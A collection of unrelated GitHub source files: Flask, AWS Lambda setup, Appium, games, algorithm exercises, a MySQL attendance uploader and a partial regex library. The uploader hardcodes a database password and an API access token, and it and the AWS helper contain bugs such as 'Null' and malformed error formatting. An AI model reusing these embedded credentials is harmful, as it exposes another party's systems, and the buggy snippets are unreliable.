+{"seq_id":"71818459894","text":"from flask import render_template, Blueprint, request, redirect, url_for, g\n\nfrom sqlalchemy import func, select, Table, Column, Integer, String, and_, sql\nfrom sqlalchemy.sql.expression import text, and_\nfrom paginate_sqlalchemy import SqlalchemySelectPage, SqlalchemyOrmPage\n\nimport crosstab\n\nfrom flock import model\nfrom flock_web.app import db, url_for_other_page\n\n\nbp_root = Blueprint(\n 'root', __name__,\n static_folder='static',\n template_folder='templates',\n url_prefix='/'\n )\n\n\n@bp_root.url_defaults\ndef add_collection(endpoint, values):\n values.setdefault('collection', getattr(g, 'collection', None))\n\n\n@bp_root.url_value_preprocessor\ndef pull_collection(endpoint, values):\n g.collection = values.pop('collection')\n\n\n@bp_root.route('/')\ndef index():\n return redirect(url_for('.tweets'))\n\n\ndef feature_query_args():\n feature_query = request.args.copy()\n return feature_query\n\n\n@bp_root.route('/tweets')\ndef tweets():\n page_num = int(request.args.get('_page', 1))\n items_per_page = int(request.args.get('_items_per_page', 20))\n\n feature_query = feature_query_args()\n\n tweets = (\n db.session.query(model.Tweet)\n .filter(model.Tweet.collection == g.collection)\n .filter(*(model.Tweet.features.contains({k: [v]}) for k, v in feature_query.items() if not k.startswith('_')))\n .order_by(model.Tweet.created_at, model.Tweet.tweet_id)\n )\n\n page = SqlalchemyOrmPage(\n tweets,\n page=page_num, items_per_page=items_per_page,\n url_maker=url_for_other_page,\n )\n\n return render_template(\n 'root/tweets.html',\n page=page,\n )\n\n\n@bp_root.route('/tweets/')\ndef features(feature_name):\n other_feature = request.args.get('_other', None)\n unstack = request.args.get('_unstack', None) if other_feature is not None else None\n other_feature_values = None\n\n page_num = int(request.args.get('_page', 1))\n items_per_page = int(request.args.get('_items_per_page', 20))\n\n feature_query = feature_query_args()\n\n features_to_filter = [model.Tweet.features.contains({k: [v]}) for k, v in feature_query.items() if not k.startswith('_')]\n feature_select = (\n select(['feature', func.count()])\n .select_from(\n text(\n ('tweet, ' if not features_to_filter else '') +\n 'jsonb_array_elements_text(tweet.features->:feature) as feature'\n ).bindparams(feature=feature_name)\n )\n .where(\n and_(\n sql.literal_column('collection') == g.collection,\n *features_to_filter,\n )\n )\n .group_by('feature')\n .order_by(func.count().desc())\n )\n\n page = SqlalchemySelectPage(\n db.session, feature_select,\n page=page_num, items_per_page=items_per_page,\n url_maker=url_for_other_page,\n )\n items = page.items\n\n if other_feature is not None:\n feature_column = sql.literal_column('feature', String)\n other_feature_column = sql.literal_column('other_feature', String)\n stmt = (\n select(\n [feature_column, other_feature_column, func.count()]\n )\n .select_from(\n text(\n 'tweet, '\n 'jsonb_array_elements_text(tweet.features->:feature) as feature, '\n 'jsonb_array_elements_text(tweet.features->:other_feature) as other_feature'\n ).bindparams(feature=feature_name, other_feature=other_feature)\n ).where(\n and_(\n sql.literal_column('collection') == g.collection,\n feature_column.in_(\n feature_select\n .with_only_columns(['feature'])\n .offset((page_num - 1) * items_per_page)\n .limit(items_per_page)\n )\n )\n )\n .group_by(feature_column, other_feature_column)\n )\n\n items = db.session.execute(stmt.order_by(func.count().desc()))\n\n if unstack:\n other_feature_values_select = (\n select([other_feature_column.distinct()])\n .select_from(stmt.alias())\n )\n other_feature_values = [\n v for v, in\n db.session.execute(other_feature_values_select.order_by(other_feature_column))\n ]\n\n from sqlalchemy import MetaData\n ret_types = Table(\n '_t_', MetaData(),\n Column('feature', String),\n extend_existing=True,\n *[Column(v, Integer) for v in other_feature_values]\n )\n\n row_total = crosstab.row_total(\n [ret_types.c[v] for v in other_feature_values]\n ).label('total')\n\n stmt = (\n select(\n [\n '*', row_total,\n ]\n )\n .select_from(\n crosstab.crosstab(\n stmt,\n ret_types,\n categories=other_feature_values_select,\n )\n )\n .order_by(\n row_total.desc(),\n ret_types.c.feature,\n )\n )\n\n items = db.session.execute(stmt)\n\n return render_template(\n 'root/features.html',\n feature_name=feature_name,\n other_feature_name=other_feature,\n other_feature_values=other_feature_values,\n page=page,\n items=items,\n )\n","repo_name":"henryj885/flock","sub_path":"flock-web/flock_web/blueprints/root/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24920152415","text":"from urllib.parse import urlparse\r\nimport boto3\r\nfrom botocore.exceptions import ClientError\r\n\r\nfrom awsdest.utils.core_aws import *\r\n\r\ndef _isthere__s3_bucketfolder_notification_config(awsconfig, s3folder):\r\n parsed = urlparse(s3folder, allow_fragments=False)\r\n bucketin = parsed.netloc\r\n s3folder_prefix = parsed.path.lstrip('/')\r\n try:\r\n s3_client = boto3.client('s3', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = s3_client.get_bucket_notification_configuration(Bucket=bucketin)\r\n\r\n if 'LambdaFunctionConfigurations' in response or \\\r\n 'TopicConfigurations' in response or \\\r\n 'QueueConfigurations' in response :\r\n # print(\"This bucket does event config set\"\r\n return True\r\n\r\n return False\r\n\r\n # following will never be executed by design. Since we want to aboid creating event notifications if there is some on bucket already.\r\n # our process wipes out previos configurations.\r\n lambdaFuncConfigs_list = response['LambdaFunctionConfigurations']\r\n for lc in lambdaFuncConfigs_list:\r\n lc1 = lc['Filter']['Key']['FilterRules']\r\n for lc2 in lc1:\r\n if lc2['Name'] == \"Prefix\" and str.rstrip(lc2['Value'], \"/\") == str.rstrip(s3folder_prefix,\"/\"): # if folder prefix matches then there is a notification on that folder prefix\r\n print(\"This s3bucket:/folder has lambda functon configuration already:\", lc)\r\n return True\r\n\r\n except ClientError as e:\r\n print(\"Error getting s3_event_configuration \" % e)\r\n return Null\r\n\r\n\r\ndef validate_lambda_folders(awsconfig, s3folderin_lambda, s3folderout_lambda):\r\n if number_of_files_s3folder(awsconfig, s3folderin_lambda) < 0:\r\n print(\"S3 input folder non existent.\")\r\n return False\r\n\r\n if number_of_files_s3folder(awsconfig, s3folderout_lambda) < 0:\r\n print(\"S3 output folder non existent.\")\r\n return False\r\n\r\n # check if input and output folder as same. We do not want events/triggers that result in an infinite loop of executions\r\n if str.rstrip(s3folderin_lambda, \"/\") == str.rstrip(s3folderout_lambda, \"/\"):\r\n print(\" cannot have input and output folders same to prevent infinite lambda loop triggers\")\r\n return False\r\n\r\n # check if there are events/lambda defined on this bucket and folder specifically\r\n # we do not want conflicts. So being extra careful.\r\n if _isthere__s3_bucketfolder_notification_config(awsconfig, s3folderin_lambda):\r\n print(\"Event configuration exists on this bucket. Do not want to create additional configuration:\",\r\n s3folderin_lambda)\r\n return False\r\n\r\n if _isthere__s3_bucketfolder_notification_config(awsconfig, s3folderout_lambda):\r\n print(\"Event configuration exists on this folder. Do not want to create additional configuration:\",\r\n s3folderout_lambda)\r\n return False\r\n\r\n return True\r\n\r\n\r\ndef create_lambda_layer(awsconfig, lambdaconfig):\r\n l = open('lambda_layers/lambda_layers_k8s_requests_etc_packages_1.zip', 'rb')\r\n layer_zipfile = l.read()\r\n\r\n try:\r\n lambda_client = boto3.client('lambda', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = lambda_client.publish_layer_version(LayerName='lambda_scoring_layer',\r\n Content={'ZipFile': layer_zipfile\r\n },\r\n )\r\n lambda_layer_arn = response['LayerArn']\r\n lambda_layer_version = response['Version']\r\n\r\n #layer_arn_ver = 'arn:aws:lambda:us-east-1:617292774228:layer:lambda_scoring_layer:1'\r\n #response = lambda_client.add_layer_version_permission(\r\n # LayerName='lambda_scoring_layer',\r\n # VersionNumber='$LATEST',\r\n # StatementId='1',\r\n # Action='lambda:GetLayerVersion',\r\n # Principal='*'\r\n #)\r\n\r\n return (lambda_layer_arn, lambda_layer_version)\r\n\r\n except ClientError as e:\r\n print(\"Error creating lambda layer \" % e)\r\n return Null\r\n\r\n\r\ndef _create_lambda_function(awsconfig, lambdaconfig, k8sconfig, model_imagename, s3folderin_lambda, s3folderout_lambda):\r\n aws_eks_cluster_name = awsconfig['aws_eks_cluster_name']\r\n ingress_controller_url = awsconfig['ingress_controller_url']\r\n aws_region = awsconfig['aws_region']\r\n k8s_namespace = k8sconfig['k8s_namespace']\r\n\r\n lambda_execution_role = lambdaconfig['lambda_execution_arn_role']\r\n lambda_function_name = lambdaconfig['lambda_function_name']\r\n lambda_layer_arn = lambdaconfig['lambda_layer_arn']\r\n lambda_layer_version = lambdaconfig['lambda_layer_version']\r\n\r\n f = open('lambda_function_dependencies/lambdafunc_scoring_dependencies.zip', 'rb')\r\n function_zipfile = f.read()\r\n\r\n try:\r\n lambda_client = boto3.client('lambda', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n\r\n lambda_layer_arn_version = lambda_layer_arn + \":\" + lambda_layer_version\r\n\r\n response = lambda_client.create_function(\r\n FunctionName=lambda_function_name,\r\n Runtime='python3.7',\r\n Role=lambda_execution_role,\r\n Handler='lambdafunc_scoring.scoring_lambda_handler',\r\n Code={\r\n 'ZipFile': function_zipfile,\r\n },\r\n Timeout=899,\r\n MemorySize=128,\r\n Environment={\r\n 'Variables': {\r\n 'fallback_modelname': model_imagename,\r\n 'fallback_clustername': aws_eks_cluster_name,\r\n 'fallback_ingress_url' : ingress_controller_url,\r\n 's3_outputfolder': s3folderout_lambda,\r\n 'aws_region': aws_region,\r\n 'k8s_namespace' : k8s_namespace\r\n }\r\n },\r\n Layers=[lambda_layer_arn_version]\r\n )\r\n functionArn = response['FunctionArn']\r\n\r\n response = lambda_client.add_permission(\r\n FunctionName=functionArn,\r\n StatementId='1',\r\n Action='lambda:InvokeFunction',\r\n Principal='s3.amazonaws.com'\r\n )\r\n return functionArn\r\n\r\n except ClientError as e:\r\n print(\"Error creating lambda function \" % e)\r\n return Null\r\n\r\n\r\ndef _create_s3bucket_notificationfunc(awsconfig, lambdaconfig, s3folderin_lambda, functionArn):\r\n parsed = urlparse(s3folderin_lambda, allow_fragments=False)\r\n bucketin = parsed.netloc\r\n s3prefix = parsed.path.lstrip('/')\r\n\r\n lambda_function_name = lambdaconfig['lambda_function_name']\r\n\r\n try:\r\n s3_client = boto3.client('s3', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = s3_client.put_bucket_notification_configuration(\r\n Bucket=bucketin,\r\n NotificationConfiguration={\r\n 'LambdaFunctionConfigurations': [\r\n {\r\n 'Id': lambda_function_name,\r\n 'LambdaFunctionArn': functionArn,\r\n 'Events': [\r\n 's3:ObjectCreated:*'\r\n ],\r\n 'Filter': {\r\n 'Key': {\r\n 'FilterRules': [\r\n {\r\n 'Name': 'prefix', 'Value': s3prefix\r\n },\r\n {\r\n 'Name': 'suffix', 'Value': '.csv'\r\n }\r\n ]\r\n }\r\n }\r\n }\r\n ]\r\n }\r\n )\r\n print(\"Event Notification created on S3 Input bucket that invokes above Lambda Function\", bucketin)\r\n except ClientError as e:\r\n print(\"Error creating event notification configuration on s3 bucket \" % e)\r\n return Null\r\n # except Exception as e:\r\n # print(str(e))\r\n # raise e\r\n\r\n\r\ndef create_lambda_setup(awsconfig,lambdaconfig, k8sconfig, model_imagename, s3folderin_lambda, s3folderout_lambda):\r\n functionArn = _create_lambda_function(awsconfig, lambdaconfig, k8sconfig, model_imagename, s3folderin_lambda, s3folderout_lambda)\r\n print(\"Lambda Function created functionArn:\", functionArn)\r\n _create_s3bucket_notificationfunc(awsconfig, lambdaconfig, s3folderin_lambda, functionArn)\r\n\r\n\r\n######\r\n\r\ndef _delete_s3bucket_notificationfunc(awsconfig, s3folderin_lambda):\r\n parsed = urlparse(s3folderin_lambda, allow_fragments=False)\r\n bucketin = parsed.netloc\r\n try:\r\n # delete by saving an empty notification configuration.\r\n s3_client = boto3.client('s3', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = s3_client.put_bucket_notification_configuration(\r\n Bucket=bucketin,\r\n NotificationConfiguration={\r\n }\r\n )\r\n print(\"Deleted ALL Event notification configurations on bucket \", )\r\n except ClientError as e:\r\n print(\"Error creating event notification configuration on s3 bucket \" % e)\r\n return Null\r\n # except Exception as e:\r\n # print(str(e))\r\n # raise e\r\n\r\n\r\ndef _delete_lambda_function(awsconfig, lambdaconfig):\r\n lambda_function_name = lambdaconfig['lambda_function_name']\r\n\r\n try:\r\n lambda_client = boto3.client('lambda', aws_access_key_id=awsconfig['aws_access_key_id'],\r\n aws_secret_access_key=awsconfig['aws_secret_access_key'])\r\n response = lambda_client.delete_function(FunctionName=lambda_function_name)\r\n\r\n # do not delete layer here. see why @ https://stackoverflow.com/questions/60824745/aws-delete-lambda-layer-still-retains-layer-version-history/61103244#61103244\r\n\r\n return True\r\n\r\n except ClientError as e:\r\n print(\"Error creating lambda function or layer \" % e)\r\n return Null\r\n\r\n\r\ndef delete_lambda_setup(awsconfig, lambdaconfig, s3folderin_lambda):\r\n _delete_s3bucket_notificationfunc(awsconfig,s3folderin_lambda) # deletes all notifcations. Bad. Restricting to folder prefix is not provided by AWS SDK.\r\n _delete_lambda_function(awsconfig, lambdaconfig)\r\n","repo_name":"nallagangus/sasmm_modops","sub_path":"awsdest/utils/core_aws_lambda.py","file_name":"core_aws_lambda.py","file_ext":"py","file_size_in_byte":10768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38526357936","text":"# 11725_트리의부모찾기_find-parent-tree\n\nN = int(input())\n\nadjL = [[] for _ in range(N+1)]\nparent = [0]*(N+1)\nvisited = [0]*(N+1)\nfor _ in range(N-1):\n n1, n2 = map(int, input().split())\n adjL[n1].append(n2)\n adjL[n2].append(n1)\n\nstack = [1]\n\nwhile stack:\n node = stack.pop()\n visited[node] = 1\n for c in adjL[node]:\n if not visited[c]:\n stack.append(c)\n parent[c] = node\n visited[c] = 1\n\nfor i in range(2, N+1):\n print(parent[i])\n\n","repo_name":"MinWoongL/Algorithm_Study","sub_path":"Baekjoon/gold_to_platinum_230215/11725_find-parent-tree.py","file_name":"11725_find-parent-tree.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22176328112","text":"from turtle import Turtle\nfrom random import randint\n\n\ndef move_snake(snake_head):\n if snake_head.direction == \"up\":\n snake_y_position = snake_head.ycor()\n snake_y_position += 20\n snake_head.sety(snake_y_position)\n if snake_head.direction == \"down\":\n snake_y_position = snake_head.ycor()\n snake_y_position -= 20\n snake_head.sety(snake_y_position)\n if snake_head.direction == \"right\":\n snake_x_position = snake_head.xcor()\n snake_x_position += 20\n snake_head.setx(snake_x_position)\n if snake_head.direction == \"left\":\n snake_x_position = snake_head.xcor()\n snake_x_position -= 20\n snake_head.setx(snake_x_position)\n\n\ndef make_turtle(turtle_shape, turtle_color):\n turtle_object = Turtle()\n turtle_object.shape(turtle_shape)\n turtle_object.color(turtle_color)\n turtle_object.speed(\"fastest\")\n turtle_object.penup()\n return turtle_object\n\n\ndef change_turtle_object_position_in_random_place(turtle_object):\n\n x = randint(-270, 270)\n y = randint(-270, 230)\n turtle_object.goto(x, y)\n\n\ndef reset(snake_head, snake_body):\n snake_head.goto(0, 0)\n snake_head.direction = \"\"\n for body in snake_body:\n body.ht()\n snake_body.clear()\n","repo_name":"mostafa-sadeghi/hadi_khodaei","sub_path":"snake_game_utils.py","file_name":"snake_game_utils.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18233554683","text":"# -*- coding: utf-8 -*-\n# Author:jiang\n# 2021/9/15 15:00\nimport inspect\nimport json\nimport logging\n\nimport yaml\nfrom appium.webdriver import WebElement\nfrom appium.webdriver.common.mobileby import MobileBy\nfrom appium.webdriver.webdriver import WebDriver\nfrom appium_xueqiu.page.wrapper import handle_black\n\nclass BasePage:\n _params={}\n logging.basicConfig(level=logging.INFO)\n #弹框处理的定位列表\n _black_list=[\n (MobileBy.XPATH,\"//*[@text='确定']\"),\n (MobileBy.XPATH, \"//*[@text='下次再说']\"),\n (MobileBy.XPATH, \"//*[@text='确认']\"),\n ]\n _max_num=3\n _error_num=0\n def __init__(self,driver:WebDriver = None):\n self._driver=driver\n def set_implicitly(self,time):\n self._driver.implicitly_wait(time)\n def screenshot(self,name):\n self._driver.save_screenshot(name)\n def finds(self,locator,value:str=None):\n elements:list #返回值是list\n if isinstance(locator, tuple):\n elements = self._driver.find_elements(*locator)\n else:\n elements = self._driver.find_elements(locator, value)\n return elements\n @handle_black\n def find(self,locator,value:str=None):\n # logging.info(locator)\n # logging.info(value)\n element:WebElement\n if isinstance(locator,tuple):\n element=self._driver.find_element(*locator)\n else:\n element=self._driver.find_element(locator,value)\n return element\n @handle_black\n def find_and_get_text(self,locator,value:str=None):\n element:WebElement\n if isinstance(locator,tuple):\n element_text=self._driver.find_element(*locator).text\n else:\n element_text=self._driver.find_element(locator,value).text\n return element_text\n def steps(self,path):\n with open(path,encoding=\"utf-8\") as f:\n name=inspect.stack()[1].function #获取当前被调用的函数名\n steps=yaml.safe_load(f)[name]\n #yaml文件内容进行参数化\n raw=json.dumps(steps)\n for key,value in self._params.items():\n raw=raw.replace(f'${{{key}}}',value) #f语法 {{}}转义 -> 代表{} {key}:变量名称\n #raw = raw.replace('${'+key+'}', value) 与上面等价\n steps=json.loads(raw)\n for step in steps:\n if \"action\" in step.keys():\n action=step[\"action\"]\n if \"click\"==action:\n self.find(step[\"by\"], step[\"locator\"]).click()\n if \"send\"==action:\n self.find(step[\"by\"], step[\"locator\"]).send_keys(step[\"value\"])\n if \"len > 0\" ==action:\n eles=self.finds(step[\"by\"],step[\"locator\"])\n return len(eles)>0\n","repo_name":"jiangdeping/PyTestProject","sub_path":"appium_xueqiu/page/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"752858769","text":"from Tkinter import *\n\nclass Application(Frame):\n\n\tdef __init__(self, master):\n\t\tFrame.__init__(self, master)\n\t\tself.grid()\n\t\tself.create_widgets()\n\n\tdef create_widgets(self):\n\t\tLabel(self, \n\t\t\t text = \"Choose your favorite movie genres\"\n\t\t\t ).grid(row = 0, column = 0, sticky = W)\n\n\t\tLabel(self, \n\t\t\t text = \"Select all that apply\"\n\t\t\t ).grid(row = 1, column = 0, sticky = W)\n\n\t\tself.favorite = StringVar()\n\t\t\n\t\t# Default select one of the things so that they arent all checked\n\t\tself.favorite.set(\"comedy.\")\n\n\t\tRadiobutton(self,\n\t\t\t\t\ttext = \"Comedy\",\n\t\t\t\t\tvariable = self.favorite,\n\t\t\t\t\tvalue = \"comedy.\",\n\t\t\t\t\tcommand = self.update_text\n\t\t\t\t\t).grid(row = 2, column = 0, sticky = W)\n\n\t\tRadiobutton(self,\n\t\t\t\t\ttext = \"Drama\",\n\t\t\t\t\tvariable = self.favorite,\n\t\t\t\t\tvalue = \"drama.\",\n\t\t\t\t\tcommand = self.update_text\n\t\t\t\t\t).grid(row = 3, column = 0, sticky = W)\n\n\t\tRadiobutton(self,\n\t\t\t\t\ttext = \"Romance\",\n\t\t\t\t\tvariable = self.favorite,\n\t\t\t\t\tvalue = \"romance.\",\n\t\t\t\t\tcommand = self.update_text\n\t\t\t\t\t).grid(row = 4, column = 0, sticky = W)\n\t\tself.result = Text(self,\n\t\t\t\t\t\t width = 40,\n\t\t\t\t\t\t height = 5,\n\t\t\t\t\t\t wrap = WORD)\n\t\tself.result.grid(row = 5, column = 0)\n\n\tdef update_text(self):\n\t\tmessage = \"Your favorite type of movie is %s\" % self.favorite.get()\n\t\tself.result.delete(0.0, END)\n\t\tself.result.insert(0.0, message)\n\nroot = Tk()\nroot.title(\"Check Button Tests\")\nroot.geometry(\"400x200\")\n\napp = Application(root)\nroot.mainloop()","repo_name":"vchan418/pythonGUI","sub_path":"radio_buttons.py","file_name":"radio_buttons.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30656079674","text":"# Exercise 16 of \"Learn Python3 the Hard Way\"\n# Reading and Writing Files\n#\n# close(), read(), readline(), truncate(), write(\"stuff\"), seek(0)\n# open mode: r, r+, w, w+, a, a+\n# seek(0) moving the file handle position to the beginning of the file.\n\nfrom sys import argv\n\nscript, filename = argv\n\nprint(f\"We're going to erase {filename}.\")\nprint(\"If you don't want that, hit Ctrl-C (^C).\")\nprint(\"If you do want that, hit RETURN.\")\n\ninput(\"?\")\n\nprint(\"Opening the file...\")\ntarget = open(filename, \"w\")\n\nprint(\"Truncating the file. Goodbye!\")\ntarget.truncate()\n\nprint(\"Now I'm going to ask you for three lines.\")\n\nline1 = input(\"line 1: \")\nline2 = input(\"line 2: \")\nline3 = input(\"line 3: \")\n\nprint(\"I'm going to write these to the file.\")\n\ntarget.write(line1)\ntarget.write(\"\\n\")\ntarget.write(line2)\ntarget.write(\"\\n\")\ntarget.write(line3)\ntarget.write(\"\\n\")\n\nprint(\"And finally, we close it.\")\ntarget.close()\n\n# Practice\nprint(\"\\n# Practice #\")\n# target = open(filename, \"r+\")\n# txt1 = target2.read() ## wrong statement\ntarget = open(filename, \"a+\")\n# seek(0) moving the file handle position to the beginning of the file.\ntarget.seek(0)\nprint(\"\\nRead Again!\\n{}\".format(target.read()))\n\nlines = (\n \" === below are added by Practice===\\n \"\n + line1\n + \"\\n \"\n + line2\n + \"\\n \"\n + line3\n + \"\\n \"\n)\ntarget.write(lines)\n\ntarget.seek(0)\nprint(\"\\nRead One More Time!\\n{}\".format(target.read()))\n\ntarget.close()\n","repo_name":"TomFoxLee/Python543","sub_path":"LPY3THW/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"121660943","text":"import mysql.connector\nimport json\nimport urllib3\n\n\ndef sendBiometrias(pessoa):\n url = 'http://200.18.32.62:8070/siot/webservice/carga/salvePresencas'\n http = urllib3.PoolManager(\n header={\n 'X-UFSM-Access-Token': \"e115a01f0829cca9958dc06ac3c8e2abca742c7b7c6cbdf1f492fc2a72547bac\",\n 'X-UFSM-Device-ID': \"a85f34385350073a\",\n 'Content-Type': \"application/json\"\n })\n r = http.request('POST', url, body = pessoa)\n return r\n\nmydb = mysql.connector.connect(\n host=\"200.18.32.171\",\n user=\"root\",\n passwd=\"#iotcl@ss\",\n database=\"db_pi_teste\"\n)\n\nmycursor = mydb.cursor()\nsql = \"SELECT P.ID_PRESENCA, P.ID_ALUNO, P.PRESENTE, PT.ID_TURMA, \\\n T.DISCIPLINA, T.HORA_INICIO, T.HORA_FIM, T.DIA_SEMANA, PT.DATA \\\n FROM PRESENCA P INNER JOIN PRESENCA_TURMA PT \\\n INNER JOIN TURMA T ON PT.ID_PRESENCA = P.ID_PRESENCA AND T.ID_TURMA = PT.ID_TURMA\"\n\nmycursor.execute(sql)\nmyresult = mycursor.fetchall()\npb = list()\n\nfor x in myresult:\n turma = {\n 'disciplina': str(x[4]),\n 'horaInicio': str(x[5]),\n 'horaFim': str(x[6]),\n 'diaSemana': x[7]\n }\n\n presenca = {\n 'id': x[0],\n 'aluno': {'id': x[1]},\n 'presente': x[2]\n }\n\n ptc = {\n 'presenca': presenca,\n 'turma': turma,\n 'data': str(x[8])\n }\n\n pb.append(ptc)\n\nprint(pb)\njpess = json.dumps(pb)\nprint('status: ', sendBiometrias(jpess).status) # --> /webservice/carga/salveBiometrias\nprint(jpess)\n","repo_name":"moisesoliv/iclass-fog","sub_path":"backp.py","file_name":"backp.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7428575187","text":"\"\"\"\n The Tribonacci sequence Tn is defined as follows:\n\n T0 = 0, T1 = 1, T2 = 1, and Tn+3 = Tn + Tn+1 + Tn+2 for n >= 0.\n\n Given n, return the value of Tn.\n\"\"\"\ndef tribonacci(n):\n res = [0 for i in range(n + 1)]\n res[0] = 0\n res[1] = 1\n res[2] = 1\n\n for j in range(3, n + 1, 1):\n res[j] = sum(res[j - 3: j])\n\n return res[n]\n\n\nprint(f'tribonacci(4): {tribonacci(4)} ') #4\nprint(f'tribonacci(25): {tribonacci(25)} ') #1389537\n","repo_name":"ChristineGoGo/leetcode-problems","sub_path":"1137_n-th_tribonacci_number.py","file_name":"1137_n-th_tribonacci_number.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26815811553","text":"#!/usr/bin/env python3\n\n_license = \"\"\"\nbig\nCopyright 2022-2023 Larry Hastings\nAll rights reserved.\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR\nTHE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport enum\nimport functools\nimport itertools\nfrom itertools import zip_longest\nfrom .itertools import PushbackIterator\nfrom . import state\nimport math\nimport operator\nimport re\nimport struct\nimport sys\n\ntry:\n from re import Pattern as re_Pattern\nexcept ImportError: # pragma: no cover\n re_Pattern = re._pattern_type\n\ntry:\n import regex\n regex_Pattern = regex.Pattern\n def isinstance_re_pattern(o):\n return isinstance(o, (re_Pattern, regex_Pattern))\nexcept ImportError: # pragma: no cover\n regex_Pattern = re_Pattern\n def isinstance_re_pattern(o):\n return isinstance(o, re_Pattern)\n\n\n__all__ = []\n\ndef _export_name(s):\n __all__.append(s)\n\ndef _export(o):\n _export_name(o.__name__)\n return o\n\n\ndef _iterate_over_bytes(b):\n # this may not actually iterate over bytes.\n # for example, we iterate over apostrophes and double_quotes\n # for gently_title, and those might be strings or bytes,\n # or iterables of strings or bytes.\n if isinstance(b, bytes):\n return (b[i:i+1] for i in range(len(b)))\n return iter(b)\n\n\n@_export\ndef re_partition(s, pattern, count=1, *, flags=0, reverse=False):\n \"\"\"\n Like str.partition, but pattern is matched as a regular expression.\n\n s can be either a str or bytes object.\n\n pattern can be a str, bytes, or re.Pattern object.\n\n s and pattern (or pattern.pattern) must be the same type.\n\n If pattern is found in s, returns a tuple\n (before, match, after)\n where before is the text before the match,\n match is the re.Match object resulting from the match, and\n after is the text after the match.\n\n If pattern appears in s multiple times,\n re_partition will match against the first (leftmost)\n appearance.\n\n If pattern is not found in s, returns a tuple\n (s, None, '')\n where the empty string is str or bytes as appropriate.\n\n To convert the output into a tuple of strings like str.partition,\n use\n t = re_partition(...)\n t2 = (t[0], t[1].group(0) if t[1] else '', t[2])\n\n Passing in an explicit \"count\" lets you control how many times\n re_partition partitions the string. re_partition will always\n return a tuple containing (2*count)+1 elements, and\n odd-numbered elements will be either re.Match objects or None.\n Passing in a count of 0 will always return a tuple containing s.\n\n If pattern is a string or bytes, flags is passed in\n as the flags argument to re.compile.\n\n If reverse is true, partitions starting at the right,\n like re_rpartition.\n\n You can pass in an instance of a subclass of bytes or str\n for s and pattern (or pattern.pattern), but the base class\n for both must be the same (str or bytes). re_partition will\n only return str or bytes objects.\n\n (In older versions of Python, re.Pattern was a private type called\n re._pattern_type.)\n \"\"\"\n if reverse:\n return re_rpartition(s, pattern, count, flags=flags)\n\n if isinstance(s, bytes):\n empty_string = b''\n extension = (None, b'')\n else:\n empty_string = ''\n extension = (None, '')\n\n if not isinstance_re_pattern(pattern):\n pattern = re.compile(pattern, flags=flags)\n\n # optimized fast path for the most frequent use case\n if count == 1:\n match = pattern.search(s)\n if not match:\n return (s, None, empty_string)\n before, separator, after = s.partition(match.group(0))\n return (before, match, after)\n\n if count == 0:\n return (s,)\n\n if count < 0:\n raise ValueError(\"count must be >= 0\")\n\n result = []\n extend = result.extend\n matches_iterator = pattern.finditer(s)\n\n try:\n for remaining in range(count, 0, -1):\n match = next(matches_iterator)\n before, separator, s = s.partition(match.group(0))\n extend((before, match))\n extension = ()\n except StopIteration:\n extension *= remaining\n\n result.append(s)\n return tuple(result) + extension\n\n@_export\ndef reversed_re_finditer(pattern, string, flags=0):\n \"\"\"\n An iterator. Behaves almost identically to the Python\n standard library function re.finditer, yielding non-overlapping\n matches of \"pattern\" in \"string\". The difference is,\n reversed_re_finditer searches \"string\" from right to left.\n\n pattern can be str, bytes, or a precompiled re.Pattern object.\n If it's str or bytes, it'll be compiled with re.compile using\n the flags you passed in.\n\n string should be the same type as pattern (or pattern.pattern).\n \"\"\"\n if not isinstance_re_pattern(pattern):\n pattern = re.compile(pattern, flags=flags)\n\n def reversed_re_finditer(pattern, string):\n # matches are found by re.search *going forwards.*\n # but what we 